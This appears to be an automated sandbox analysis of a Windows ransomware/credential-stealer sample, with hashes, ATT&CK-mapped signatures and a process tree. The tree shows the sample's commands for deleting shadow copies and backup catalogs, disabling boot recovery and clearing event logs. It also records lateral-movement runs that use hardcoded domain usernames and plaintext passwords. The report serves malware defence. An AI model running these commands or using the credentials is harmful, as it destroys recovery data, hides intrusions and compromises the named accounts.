mimikatz | 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471

Resubmissions

26-08-2024 09:41

240826-ln48csyerj 10

29-01-2022 07:52

220129-jqhe9sgcg5 10

Analysis

max time kernel
156s
max time network
156s
platform
windows7_x64
resource
win7-en-20211208
submitted
29-01-2022 07:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Size

1.8MB
MD5

59c3f3f99f44029de81293b1e7c37ed2
SHA1

fb07496900468529719f07ed4b7432ece97a8d3d
SHA256

32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471
SHA512

9b3bd8a76d754bf9c899111be986c4fd6d14f6993a9a0e3dcd9b4a76c0f7764ac8798f5cbc7a0467c1562638d85bf52f627bd32c125f587b1e838beaf03c8a0e

Score

10^/10

mimikatz discovery evasion ransomware spyware stealer

Malware Config

Signatures

Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1676	bcdedit.exe
1764	bcdedit.exe

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

resource	yara_rule
behavioral1/memory/2016-65-0x0000000180000000-0x000000018002B000-memory.dmp	mimikatz

Deletes backup catalog 3 TTPs 1 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
1456	wbadmin.exe

Executes dropped EXE 64 IoCs

pid	Process
516	iznhy.exe
2016	djczx.exe
1104	_nes.exe
884	_dab.exe
1112	_dab.exe
2028	_dab.exe
696	_dab.exe
612	_dab.exe
1332	_dab.exe
1444	_dab.exe
1144	_dab.exe
1596	_dab.exe
1148	_dab.exe
1740	_dab.exe
1780	_dab.exe
1032	cmd.exe
968	_dab.exe
392	_dab.exe
1800	_dab.exe
1780	_dab.exe
1348	_dab.exe
812	_dab.exe
1704	_dab.exe
1640	_dab.exe
640	_dab.exe
2012	_dab.exe
1824	_dab.exe
364	_dab.exe
1764	_dab.exe
1528	_dab.exe
1964	_dab.exe
1456	_dab.exe
984	_dab.exe
1348	_dab.exe
1764	_dab.exe
1220	_dab.exe
1780	_dab.exe
1824	_dab.exe
1380	_dab.exe
1364	_dab.exe
1800	_dab.exe
1764	_dab.exe
1644	_dab.exe
724	_dab.exe
852	_dab.exe
1956	_dab.exe
1768	_dab.exe
1964	_dab.exe
1896	_dab.exe
1640	_dab.exe
1596	_dab.exe
2020	_dab.exe
724	_dab.exe
968	_dab.exe
1896	_dab.exe
1504	_dab.exe
760	_dab.exe
2020	_dab.exe
1304	_dab.exe
1896	_dab.exe
1716	_dab.exe
1220	_dab.exe
1644	_dab.exe
1768	_dab.exe

Loads dropped DLL 64 IoCs

pid	Process
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
604	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2016	djczx.exe
2016	djczx.exe
2016	djczx.exe
2016	djczx.exe
2016	djczx.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeSecurityPrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeTakeOwnershipPrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeLoadDriverPrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeSystemProfilePrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeSystemtimePrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeProfSingleProcessPrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeIncBasePriorityPrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeCreatePagefilePrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeBackupPrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeRestorePrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeShutdownPrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeDebugPrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeSystemEnvironmentPrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeRemoteShutdownPrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeUndockPrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeManageVolumePrivilege	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: 33	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: 34	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: 35	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Token: SeDebugPrivilege	2016	djczx.exe
Token: SeShutdownPrivilege	1104	_nes.exe
Token: SeBackupPrivilege	1760	wbengine.exe
Token: SeRestorePrivilege	1760	wbengine.exe
Token: SeSecurityPrivilege	1760	wbengine.exe
Token: SeSecurityPrivilege	1676	wevtutil.exe
Token: SeBackupPrivilege	1676	wevtutil.exe
Token: SeSecurityPrivilege	988	wevtutil.exe
Token: SeBackupPrivilege	988	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 952 wrote to memory of 516	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	27
PID 952 wrote to memory of 516	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	27
PID 952 wrote to memory of 516	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	27
PID 952 wrote to memory of 516	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	27
PID 952 wrote to memory of 2016	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	29
PID 952 wrote to memory of 2016	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	29
PID 952 wrote to memory of 2016	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	29
PID 952 wrote to memory of 2016	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	29
PID 952 wrote to memory of 1104	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	30
PID 952 wrote to memory of 1104	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	30
PID 952 wrote to memory of 1104	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	30
PID 952 wrote to memory of 1104	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	30
PID 1104 wrote to memory of 1036	1104	_nes.exe	31
PID 1104 wrote to memory of 1036	1104	_nes.exe	31
PID 1104 wrote to memory of 1036	1104	_nes.exe	31
PID 1104 wrote to memory of 1036	1104	_nes.exe	31
PID 1036 wrote to memory of 604	1036	cmd.exe	33
PID 1036 wrote to memory of 604	1036	cmd.exe	33
PID 1036 wrote to memory of 604	1036	cmd.exe	33
PID 1104 wrote to memory of 1676	1104	_nes.exe	35
PID 1104 wrote to memory of 1676	1104	_nes.exe	35
PID 1104 wrote to memory of 1676	1104	_nes.exe	35
PID 1104 wrote to memory of 1676	1104	_nes.exe	35
PID 952 wrote to memory of 884	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	34
PID 952 wrote to memory of 884	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	34
PID 952 wrote to memory of 884	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	34
PID 952 wrote to memory of 884	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	34
PID 1676 wrote to memory of 1456	1676	cmd.exe	37
PID 1676 wrote to memory of 1456	1676	cmd.exe	37
PID 1676 wrote to memory of 1456	1676	cmd.exe	37
PID 952 wrote to memory of 1112	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	40
PID 952 wrote to memory of 1112	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	40
PID 952 wrote to memory of 1112	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	40
PID 952 wrote to memory of 1112	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	40
PID 952 wrote to memory of 2028	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	41
PID 952 wrote to memory of 2028	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	41
PID 952 wrote to memory of 2028	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	41
PID 952 wrote to memory of 2028	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	41
PID 952 wrote to memory of 696	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	46
PID 952 wrote to memory of 696	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	46
PID 952 wrote to memory of 696	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	46
PID 952 wrote to memory of 696	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	46
PID 952 wrote to memory of 612	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	45
PID 952 wrote to memory of 612	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	45
PID 952 wrote to memory of 612	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	45
PID 952 wrote to memory of 612	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	45
PID 952 wrote to memory of 1332	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	47
PID 952 wrote to memory of 1332	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	47
PID 952 wrote to memory of 1332	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	47
PID 952 wrote to memory of 1332	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	47
PID 952 wrote to memory of 1444	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	52
PID 952 wrote to memory of 1444	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	52
PID 952 wrote to memory of 1444	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	52
PID 952 wrote to memory of 1444	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	52
PID 952 wrote to memory of 1144	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	53
PID 952 wrote to memory of 1144	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	53
PID 952 wrote to memory of 1144	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	53
PID 952 wrote to memory of 1144	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	53
PID 952 wrote to memory of 1596	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	54
PID 952 wrote to memory of 1596	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	54
PID 952 wrote to memory of 1596	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	54
PID 952 wrote to memory of 1596	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	54
PID 952 wrote to memory of 1148	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	58
PID 952 wrote to memory of 1148	952	32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe	58

C:\Users\Admin\AppData\Local\Temp\32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
"C:\Users\Admin\AppData\Local\Temp\32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe"
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:952
- C:\Users\Admin\AppData\Local\Temp\iznhy.exe
  123 \\.\pipe\7F6C277E-AC2F-499E-99F7-46B6AC94303E
  2⤵
  - Executes dropped EXE
  PID:516
- C:\Users\Admin\AppData\Local\Temp\djczx.exe
  123 \\.\pipe\50E4C5E0-7B55-41CE-865F-FC3700D6191B
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2016
- C:\Users\Admin\AppData\Local\Temp\_nes.exe
  "C:\Users\Admin\AppData\Local\Temp\_nes.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1036
  - - \??\c:\Windows\system32\vssadmin.exe
      c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:604
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1676
  - - C:\Windows\system32\wbadmin.exe
      wbadmin.exe delete catalog -quiet
      4⤵
      Deletes backup catalog
      PID:1456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
    3⤵
    PID:1964
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1676
  - - C:\Windows\system32\bcdedit.exe
      bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
    3⤵
    - Executes dropped EXE
    PID:1032
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl System
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
    3⤵
    PID:640
  - - C:\Windows\system32\wevtutil.exe
      wevtutil.exe cl Security
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:988
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\igmp.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:884
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1112
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:2028
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:612
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:696
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.22 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1332
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1444
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1144
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\igmp.mcast.net -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1596
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1148
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1740
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.22 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1780
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  PID:1032
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:968
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\igmp.mcast.net -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:392
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1800
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\224.0.0.22 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1780
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
  2⤵
  - Executes dropped EXE
  PID:1348
- C:\Users\Admin\AppData\Local\Temp\_dab.exe
  C:\Users\Admin\AppData\Local\Temp\_dab.exe \\10.127.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_dwy.exe"
